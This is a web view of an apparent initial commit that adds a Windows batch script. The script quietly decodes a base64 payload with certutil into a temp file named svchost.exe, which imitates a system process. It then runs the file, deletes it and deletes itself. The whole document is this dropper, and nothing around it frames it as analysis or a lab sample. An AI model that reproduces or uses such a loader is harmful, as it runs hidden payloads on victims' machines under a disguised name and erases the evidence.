initial commit
This commit is contained in:
@@ -0,0 +1,5 @@
|
||||
@echo off
|
||||
certutil -decode "%~dp0payload.b64" "%temp%\svchost.exe" >nul 2>&1
|
||||
start "" "%temp%\svchost.exe"
|
||||
del "%temp%\svchost.exe" 2>nul
|
||||
del "%~f0"
|
||||
Reference in New Issue
Block a user